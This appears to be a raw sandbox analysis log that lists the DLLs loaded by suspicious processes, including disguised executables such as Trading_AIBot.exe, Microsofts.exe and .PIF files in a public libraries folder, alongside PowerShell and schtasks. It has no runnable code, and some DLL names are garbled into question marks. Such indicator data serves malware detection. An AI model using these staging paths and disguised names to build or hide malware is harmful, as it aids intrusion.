                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ????.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: tquery.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppwmi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppcext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winscard.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: version.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: slc.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: apphelp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msimg32.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: version.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: uxtheme.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: url.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieframe.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iertutil.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netapi32.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: userenv.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winhttp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wkscli.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netutils.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: amsi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: smartscreenps.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: kernel.appcore.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winmm.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wininet.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sspicli.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: windows.storage.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wldp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: profapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mswsock.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iphlpapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winnsi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??????????.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
